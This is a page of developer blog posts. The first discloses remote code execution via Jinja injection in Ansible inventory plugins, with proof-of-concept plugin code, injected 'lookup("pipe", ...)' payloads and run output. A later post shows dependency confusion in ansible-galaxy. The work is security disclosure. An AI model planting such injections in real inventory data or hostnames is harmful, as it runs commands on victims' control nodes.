Search Results: "evgeni"

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR: Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably those fetching instances from clouds like Amazon EC2 and Hetzner Cloud, or those talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things get interesting. Somebody could add a comment to a host, and that comment would be visible to you when you use the inventory containing that host. If that comment contains a Jinja expression, it might get executed. And if that Jinja expression uses the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
        …
        "something_funny": ""
    }
}
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }}, and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/…

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
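Conceptually, AnsibleUnsafeText is a str subclass that the templating step refuses to evaluate, while everything untagged counts as "safe" and gets rendered. Here is a minimal pure-Python model of that tagging idea (my own sketch to illustrate the mechanism, not Ansible's actual implementation):

```python
# Toy model of safe/unsafe tagging -- a sketch, NOT Ansible code.

class UnsafeText(str):
    """Marks a string that must never be fed to the template engine
    (the role AnsibleUnsafeText plays in Ansible)."""

def wrap_var(value):
    """Tag a string as unsafe (simplified: plain strings only)."""
    return UnsafeText(value)

def render(value, evaluate):
    """Stand-in for the templating step: untagged strings are evaluated
    as templates, tagged-unsafe ones pass through verbatim."""
    if isinstance(value, UnsafeText):
        return str(value)      # left alone, the expression never runs
    return evaluate(value)     # "safe" data gets templated

payload = '{{ lookup("pipe", "touch /tmp/hacked") }}'
# Simulate Jinja resolving the expression (touch prints nothing -> ""):
evaluated = render(payload, lambda s: "")
untouched = render(wrap_var(payload), lambda s: "")
print(repr(evaluated))   # '' -- the expression "ran"
print(repr(untouched))   # the literal string, as with wrap_var in Ansible
```

The important design point the sketch captures is that the tag travels with the data, so the decision to skip evaluation can be made at render time, far from where the data entered the system.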
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to easily tag data as "safe" or "unsafe", and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481. But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol {{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol {{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}
PLAY RECAP ************************************************************************************************
lol {{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

8 April 2023

Evgeni Golov: Running autopkgtest with Docker inside Docker

While I am not the biggest fan of Docker, I must admit it has quite some reach across various service providers and can often be seen as an API for running things in isolated environments. One such service provider is GitHub with their Actions service. I have no idea what isolation technology GitHub uses on the outside of Actions, but inside you just get an Ubuntu system and can run whatever you want via Docker, as that comes pre-installed and pre-configured. This especially means you can run things inside vanilla Debian containers that are free from any GitHub or Canonical modifications one might not want ;-)

So, if you want to run, say, lintian from sid, you can define a job to do so:
  lintian:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run lintian on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends lintian
      - run: lintian --info --display-info *.changes
This will run on Ubuntu (latest right now means 22.04 for GitHub), but then use Docker to run the debian:sid container and execute all further steps inside it. Pretty short and straightforward, right?

Now lintian does static analysis of the package; it doesn't need to install it. What if we want to run autopkgtest, which performs tests on an actually installed package?

autopkgtest comes with various "virt servers", which provide isolation of the testbed so that it does not interfere with the host system. The simplest available virt server, autopkgtest-virt-null, doesn't actually provide any isolation, as it runs things directly on the host system. This might seem fine when executed inside an ephemeral container in a CI environment, but it also means that multiple tests have the potential to influence each other, as there is no way to revert the testbed to a clean state. For that, there are other, "real", virt servers available: chroot, lxc, qemu, docker and many more. They all have one thing in common: to use them, one needs to somehow provide an "image" (a prepared chroot, a tarball of a chroot, a VM disk, a container, …, you get it) to operate on, and most either bring a tool to create such an "image" or rely on a "registry" (online repository) to provide them.

Most users of autopkgtest on GitHub (that I could find with their terrible search) are using either the null or the lxd virt servers, probably because these are dead simple to set up (null) or the most "native" (lxd) in the Ubuntu environment. As I wanted to execute multiple tests that for sure would interfere with each other, the null virt server was out of the discussion pretty quickly. The lxd one also felt odd, as that meant I'd need to set up lxd (can be done in a few commands, but still) and it would need to download stuff from Canonical, incurring costs (which I couldn't care less about) and taking time (which I do care about!).

Enter autopkgtest-virt-docker, which was recently added to autopkgtest! No need to set things up, as GitHub already did all the Docker setup for me, and almost no waiting time to download the containers, as GitHub does heavy caching of stuff coming from Docker Hub (or at least it feels like that). The only drawback? It was added in autopkgtest 5.23, which Ubuntu 22.04 doesn't have. "We need to go deeper" and run autopkgtest from a sid container! With this idea, our current job definition would look like this:
  autopkgtest:
    runs-on: ubuntu-latest
    container: debian:sid
    steps:
      - [ do something to get a package to run autopkgtest on ]
      - run: apt-get update
      - run: apt-get install -y --no-install-recommends autopkgtest autodep8 docker.io
      - run: autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
(--setup-commands="apt-get update" is needed as the container comes with an empty apt cache and wouldn't be able to find the dependencies of the tested package.)

However, this will fail:
# autopkgtest *.changes --setup-commands="apt-get update" -- docker debian:sid
autopkgtest [10:20:54]: starting date and time: 2023-04-07 10:20:54+0000
autopkgtest [10:20:54]: version 5.28
autopkgtest [10:20:54]: host a82a11789c0d; command line:
  /usr/bin/autopkgtest bley_2.0.0-1_amd64.changes '--setup-commands=apt-get update' -- docker debian:sid
Unexpected error:
Traceback (most recent call last):
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 829, in mainloop
    command()
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 758, in command
    r = f(c, ce)
        ^^^^^^^^
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 692, in cmd_copydown
    copyupdown(c, ce, False)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 580, in copyupdown
    copyupdown_internal(ce[0], c[1:], upp)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 607, in copyupdown_internal
    copydown_shareddir(sd[0], sd[1], dirsp, downtmp_host)
  File "/usr/share/autopkgtest/lib/VirtSubproc.py", line 562, in copydown_shareddir
    shutil.copy(host, host_tmp)
  File "/usr/lib/python3.11/shutil.py", line 419, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/usr/lib/python3.11/shutil.py", line 258, in copyfile
    with open(dst, 'wb') as fdst:
         ^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/tmp/autopkgtest-virt-docker.shared.kn7n9ioe/downtmp/wrapper.sh'
autopkgtest [10:21:07]: ERROR: testbed failure: unexpected eof from the testbed
Running the same thing locally of course works, so there has to be something special about the setup at GitHub. But what?!

A bit of digging revealed that autopkgtest-virt-docker tries to use a shared directory (using Docker's --volume) to exchange things with the testbed (for the downtmp-host capability). As my autopkgtest is running inside a container itself, nothing it tells the Docker daemon to mount will actually be visible to it. In retrospect this makes total sense, and autopkgtest-virt-docker has a switch to "fix" the issue: --remote, as the Docker daemon is technically remote when viewed from the place autopkgtest runs at.

I'd argue this is not a bug in autopkgtest(-virt-docker), as the situation is actually cared for. There is even some auto-detection of "remote" daemons in the code, but it doesn't "know" how to detect the case where the daemon socket is mounted (vs. being set via an environment variable). I've opened an MR (assume remote docker when running inside docker) which should detect the case of running inside a Docker container, which kind of implies the daemon is remote. Not sure the patch will be accepted (it is a band-aid after all), but in the meantime I am quite happy with using --remote, and so could you ;-)

7 December 2021

Evgeni Golov: The Mocking will continue, until CI improves

One might think this blog is exclusively about weird language behavior and yelling at computers… Well, welcome to another episode of Jackass! Today's opponent is Ruby, or maybe minitest, or maybe Mocha. I'm not exactly sure, but it was a rather amusing exercise and I like to share my nightmares ;)

It all started with the classical "you're using old and unmaintained software, please switch to something new". The first attempt was to switch from the ci_reporter_minitest plugin to the minitest-ci plugin. While the change worked great for Foreman itself, it broke the reporting in Katello - the tests would run, but no junit.xml was generated and Jenkins rightfully complained that it got no test results.

While investigating what the hell was wrong, we realized that Katello was already using a minitest reporting plugin: minitest-reporters. Loading two different reporting plugins seemed like a good source for problems, so I tried using the same plugin for Foreman too. Guess what? After a bit of massaging (mostly to disable the second minitest-reporters initialization in Katello), reporting of test results from Katello started to work like a charm. But now the Foreman tests started to fail. Not fail to report, fail to actually run. WTH?

The failure was quite interesting too:
test/unit/parameter_filter_test.rb:5:in `block in <class:ParameterFilterTest>':
  Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
Yes, this is a single test file failing, all others were fine. The failing code doesn't look problematic on first glance:
require 'test_helper'
class ParameterFilterTest < ActiveSupport::TestCase
  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end
  test 'something' do
    something
  end
end
The failing line (5) is the mock('Example').tap call, and for some reason Mocha thinks it's not initialized here. This certainly has something to do with how the various reporting plugins inject themselves, but I really didn't want to debug how to run two reporting plugins in parallel (which, as you remember, didn't expose this behavior). So the only real path forward was to debug what's happening here.

Calling the test on its own, with one of the working reporters, was the first step:
$ bundle exec rake test TEST=test/unit/parameter_filter_test.rb TESTOPTS=-v
 
#<Mocha::Mock:0x0000557bf1f22e30>#test_0001_permits plugin-added attribute = 0.04 s = .
#<Mocha::Mock:0x0000557bf12cf750>#test_0002_permits plugin-added attributes from blocks = 0.49 s = .
 
Wait, what? #<Mocha::Mock:…>? Shouldn't this read more like ParameterFilterTest::…, as it happens for every single other test in our test suite? It definitely should! That's actually great, as it tells us that there is really something wrong with the test, and the change of the reporting plugin just makes it worse.

What comes next is sheer luck. Well, that, and years of experience in yelling at computers. We use let(:klass) to define an object called klass, and this object is a Mocha::Mock that we'll use in our tests later. Now klass is a very common term in Ruby when talking about classes and needing to store them, mostly because one can't use class, which is a keyword. Is something else in the stack using klass, and our let is overriding that, making this whole thing explode? It was! The moment we replaced klass with klass1 (silly, I know, but there also was a klass2 in that code, so it did fit), things started to work nicely.

I really liked Tomer's comment in the PR: "no idea why, but I am not going to dig into mocha to figure that out." Turns out, I couldn't let (HAH!) the code rest and really wanted to understand what happened there. What I didn't want to do is debug the whole Foreman test stack, because it is massive. So I started to write a minimal reproducer for the issue.

All starts with a Gemfile, as we need a few dependencies:
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Then a Rakefile:
require 'rake/testtask'
Rake::TestTask.new(:test) do |t|
  t.libs << 'test'
  t.test_files = FileList["test/**/*_test.rb"]
end
task :default => :test
And a test! I took the liberty to replace ActiveSupport::TestCase with Minitest::Test, as the test won't be using any Rails features and I wanted to keep my environment minimal.
require 'minitest/autorun'
require 'minitest/spec'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  extend Minitest::Spec::DSL
  let(:klass) do
    mock('Example').tap do |k|
      k.stubs(:name).returns('Example')
    end
  end
  def test_lol
    assert klass
  end
end
Well, damn, this passed! Is it Rails after all that breaks stuff? Let's add it to the Gemfile!
$ vim Gemfile
$ bundle install
$ bundle exec rake test TESTOPTS=-v
 
#<Mocha::Mock:0x0000564bbfe17e98>#test_lol = 0.00 s = .
Wait, I didn't change any code and it's already failing?! Fuck! I mean, cool! But the test isn't minimal yet. What can we reduce? let is just a fancy, lazy def, right? So instead of let(:klass) we should be able to write def klass, achieve a similar outcome, and drop that Minitest::Spec:
require 'minitest/autorun'
require 'mocha/minitest'
class ParameterFilterTest < Minitest::Test
  def klass
    mock
  end
  def test_lol
    assert klass
  end
end
$ bundle exec rake test TESTOPTS=-v
 
/home/evgeni/Devel/minitest-wtf/test/parameter_filter_test.rb:5:in `klass': Mocha methods cannot be used outside the context of a test (Mocha::NotInitializedError)
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:68:in `format_line'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/railties-6.1.4.1/lib/rails/test_unit/reporter.rb:15:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:682:in `block in record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:681:in `record'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:324:in `run_one_method'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:311:in `block (2 levels) in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `each'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:310:in `block in run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:350:in `on_signal'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:337:in `with_info_handler'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:309:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `block in __run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `map'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:159:in `__run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:136:in `run'
    from /home/evgeni/Devel/minitest-wtf/vendor/bundle/ruby/3.0.0/gems/minitest-5.10.3/lib/minitest.rb:63:in `block in autorun'
rake aborted!
Oh nice, this is even better! Instead of the mangled class name, we now get the very same error the Foreman tests aborted with, plus a nice stack trace! But wait, why is it pointing at railties? We're not loading that! Anyways, let's look at railties-6.1.4.1/lib/rails/test_unit/reporter.rb, line 68:
def format_line(result)
  klass = result.respond_to?(:klass) ? result.klass : result.class
  "%s#%s = %.2f s = %s" % [klass, result.name, result.time, result.result_code]
end
Heh, this is touching result.klass, which we just messed up. Nice! But quickly back to railties: what if we only add that to the Gemfile, not full-blown Rails?
gem 'railties'
gem 'rake'
gem 'mocha'
gem 'minitest', '~> 5.1', '< 5.11'
Yepp, same failure. It also happens with require => false added to the line, so it seems railties somehow injects itself into rake even if nothing is using it?! "Cool"!

By the way, why are we still pinning minitest to < 5.11? Oh right, this was the original reason to look into that whole topic. And, uh, it's pointing at klass there already! 4 years ago! So let's remove that boundary and, funny enough, now tests are passing again, even if we use klass! Minitest 5.11 changed how Minitest::Test is structured and seems not to rely on klass at that point anymore. And I guess Rails also changed a bit since the original pin was put in place four years ago.

I didn't want to go down another rabbit hole, finding out what changed in Rails, but I did try with 5.0 (well, 5.0.7.2 to be precise), and the output with newer (>= 5.11) Minitest was interesting:
$ bundle exec rake test TESTOPTS=-v
 
Minitest::Result#test_lol = 0.00 s = .
It's leaking Minitest::Result as klass now, instead of Mocha::Mock. So probably something along these lines was broken 4 years ago and triggered this pin. What do we learn from that?
  • klass is cursed and shouldn't be used in places where inheritance and tooling might decide to use it for some reason
  • inheritance is cursed - why the heck are implementation details of Minitest leaking inside my tests?!
  • tooling is cursed - why is railties injecting stuff when I didn't ask it to?!
  • dependency pinning is cursed - at least if you pin to avoid an issue and then forget about said issue for four years
  • I like cursed things!
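The klass shadowing at the heart of this post is language-independent: framework-side tooling prefers an attribute that user code happens to define for its own reasons. A pure-Python sketch of the same failure mode (all names hypothetical, not minitest's or Rails' real classes):

```python
# Sketch of the klass-shadowing failure mode -- hypothetical names.

class Reporter:
    """Framework-side formatter, analogous to Rails' format_line:
    it prefers result.klass over the actual class name if present."""
    def format_line(self, result):
        klass = getattr(result, "klass", result.__class__.__name__)
        return "%s#%s" % (klass, result.name)

class FrameworkResult:
    """Framework base class; 'klass' is an implementation detail
    that subclasses are implicitly expected to leave alone."""
    name = "test_lol"

class UserTest(FrameworkResult):
    # User code innocently defines 'klass' for its own purposes
    # (like let(:klass) did) and shadows the framework's attribute.
    klass = "#<Mocha::Mock:0x1234>"

print(Reporter().format_line(FrameworkResult()))  # FrameworkResult#test_lol
print(Reporter().format_line(UserTest()))         # #<Mocha::Mock:0x1234>#test_lol
```

The sketch shows why the symptom was a mangled test name rather than an immediate error: the reporter happily formats whatever klass holds, and things only explode once that value is something with side effects, like an uninitialized mock.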

3 December 2021

Evgeni Golov: Dependency confusion in the Ansible Galaxy CLI

I hope you enjoyed my last post about Ansible Galaxy Namespaces. In there I noted that I originally looked for something completely different and the namespace takeover was rather accidental. Well, originally I was looking at how the different Ansible content hosting services and their client (ansible-galaxy) behave in regard to clashes in naming of the hosted content. "Ansible content hosting services"?! There are currently three main ways for users to obtain Ansible content:
  • Ansible Galaxy - the original, community oriented, free hosting platform
  • Automation Hub - the place for Red Hat certified and supported content, available only with a Red Hat subscription, hosted by Red Hat
  • Ansible Automation Platform - the on-premise version of Automation Hub, syncs content from there and allows customers to upload own content
Now the question I was curious about was: how would the tooling behave if different sources would offer identically named content? This was inspired by Alex Birsan: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies and zofrex: Bundler is Still Vulnerable to Dependency Confusion Attacks (CVE-2020-36327), who showed that the tooling for Python, Node.js and Ruby can be tricked into fetching content from "the wrong source", thus allowing an attacker to inject malicious code into a deployment.

For the rest of this article, it's not important that there are different implementations of the hosting services, only that users can configure and use multiple sources at the same time.

The problem is that, if the user configures their server_list to contain multiple Galaxy-compatible servers, like Ansible Galaxy and Automation Hub, and then asks to install a collection, the Ansible Galaxy CLI will ask every server in the list until one returns a successful result. The exact order seems to differ between versions, but this doesn't really matter for the issue at hand.

Imagine someone wants to install the redhat.satellite collection from Automation Hub (using ansible-galaxy collection install redhat.satellite). Now if their configuration defines Galaxy as the first and Automation Hub as the second server, Galaxy is always asked whether it has redhat.satellite, and only if the answer is negative is Automation Hub asked. Today there is no redhat namespace on Galaxy, but there is a redhat user on GitHub, so…

The canonical answer to this issue is to use a requirements.yml file and set the source parameter. This parameter allows you to express "regardless which sources are configured, please fetch this collection from here". That is nice, but I think this not being the default syntax (contrary to what e.g. Bundler does) is a bad approach.
Users might overlook the security implications, as the shorter syntax without the source just "magically" works. However, I think this is not even the main problem here. The documentation says: "Once a collection is found, any of its requirements are only searched within the same Galaxy instance as the parent collection. The install process will not search for a collection requirement in a different Galaxy instance." But as it turns out, the source behavior was changed and now only applies to the exact collection it is set for, not to any dependencies this collection might have.

For the sake of the example, imagine two collections: evgeni.test1 and evgeni.test2, where test2 declares a dependency on test1 in its galaxy.yml. Actually, no need to imagine: both collections are available in version 1.0.0 from galaxy.ansible.com, and test1 version 2.0.0 is available from galaxy-dev.ansible.com. Now, given our recent reading of the docs, we craft the following requirements.yml:
collections:
- name: evgeni.test2
  version: '*'
  source: https://galaxy.ansible.com
In a perfect world, following the documentation, this would mean that both collections are fetched from galaxy.ansible.com, right? However, this is not what ansible-galaxy does. It will fetch evgeni.test2 from the specified source, determine it has a dependency on evgeni.test1 and fetch that from the "first" available source from the configuration. Take for example the following ansible.cfg:
[galaxy]
server_list = test_galaxy, release_galaxy, test_galaxy
[galaxy_server.release_galaxy]
url=https://galaxy.ansible.com/
[galaxy_server.test_galaxy]
url=https://galaxy-dev.ansible.com/
And try to install collections, using the above requirements.yml:
% ansible-galaxy collection install -r requirements.yml -vvv                 
ansible-galaxy 2.9.27
  config file = /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg
  configured module search path = ['/home/evgeni/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.10/site-packages/ansible
  executable location = /usr/bin/ansible-galaxy
  python version = 3.10.0 (default, Oct  4 2021, 00:00:00) [GCC 11.2.1 20210728 (Red Hat 11.2.1-1)]
Using /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg as config file
Reading requirement file at '/home/evgeni/Devel/ansible-wtf/collections/requirements.yml'
Found installed collection theforeman.foreman:3.0.0 at '/home/evgeni/.ansible/collections/ansible_collections/theforeman/foreman'
Process install dependency map
Processing requirement collection 'evgeni.test2'
Collection 'evgeni.test2' obtained from server explicit_requirement_evgeni.test2 https://galaxy.ansible.com/api/
Opened /home/evgeni/.ansible/galaxy_token
Processing requirement collection 'evgeni.test1' - as dependency of evgeni.test2
Collection 'evgeni.test1' obtained from server test_galaxy https://galaxy-dev.ansible.com/api
Starting collection install process
Installing 'evgeni.test2:1.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test2'
Downloading https://galaxy.ansible.com/download/evgeni-test2-1.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
Installing 'evgeni.test1:2.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test1'
Downloading https://galaxy-dev.ansible.com/download/evgeni-test1-2.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
As you can see, evgeni.test1 is fetched from galaxy-dev.ansible.com instead of galaxy.ansible.com. Now, if those servers were Galaxy and Automation Hub, and somebody managed to snag the redhat namespace on Galaxy, I would now be getting the wrong stuff. Another problematic setup would be Galaxy and an on-prem Ansible Automation Platform, as you can have any namespace on the latter and these most certainly can clash with namespaces on public Galaxy. I have reported this behavior to Ansible Security on 2021-08-26, giving a 90 days disclosure deadline, which expired on 2021-11-24. So far, the response was that this is working as designed, to allow cross-source dependencies (e.g. a private collection referring to one on Galaxy), and there is an issue to update the docs to match the code. If users want to explicitly pin sources, they are supposed to name all dependencies and their sources in requirements.yml. Alternatively they obviously can configure only one source in the configuration and always mirror all dependencies. I am not happy with this and I think this is terrible UX, explicitly inviting people to make mistakes.
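The suggested workaround of naming all dependencies and their sources explicitly would look roughly like this (a sketch; the version pins are mine, the collection names are the ones from the example above):
```yaml
collections:
  - name: evgeni.test2
    version: '1.0.0'
    source: https://galaxy.ansible.com
  # name the dependency explicitly too, so its source is also pinned
  - name: evgeni.test1
    version: '1.0.0'
    source: https://galaxy.ansible.com
```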

2 December 2021

Jonathan McDowell: Building a desktop to improve my work/life balance

ASRock DeskMini X300 It's been over 20 months since the first COVID lockdown kicked in here in Northern Ireland and I started working from home. Even when the strict lockdown was lifted the advice here has continued to be "If you can work from home you should work from home". I've been into the office here and there (for new starts, given you need to hand over a laptop and sort out some login details, it's generally easier to do so in person, and I've had a couple of whiteboard sessions that needed the high bandwidth face to face communication), but day to day is all from home. Early on I commented that work had taken over my study. This has largely continued to be true. I set my work laptop on the stand on a Monday morning and it sits there until Friday evening, when it gets switched for the personal laptop. I have a lovely LG 34UM88 21:9 Ultrawide monitor, and my laptops are small and light so I much prefer to use them docked. Also my general working pattern is to have a lot of external connections up and running (build machine, test devices, log host), which means a suspend/resume cycle disrupts things. So I like to minimise moving things about. I spent a little bit of time trying to find a dual laptop stand so I could have both machines set up and switch between them easily, but I didn't find anything that didn't seem to be geared up for DJs with a mixer + laptop combo taking up quite a bit of desk space rather than stacking laptops vertically. Eventually I realised that the right move was probably a desktop machine. Now, I haven't had a desktop machine since before I moved to the US, realising at the time that having everything on my laptop was much more convenient. I decided I didn't want something too big and noisy. Cheap GPUs seem hard to get hold of these days - I'm not a gamer, so all I need is something that can drive a ~4K monitor reliably enough. Looking around, the AMD Ryzen 7 5700G seemed to be a decent CPU with one of the better integrated GPUs.
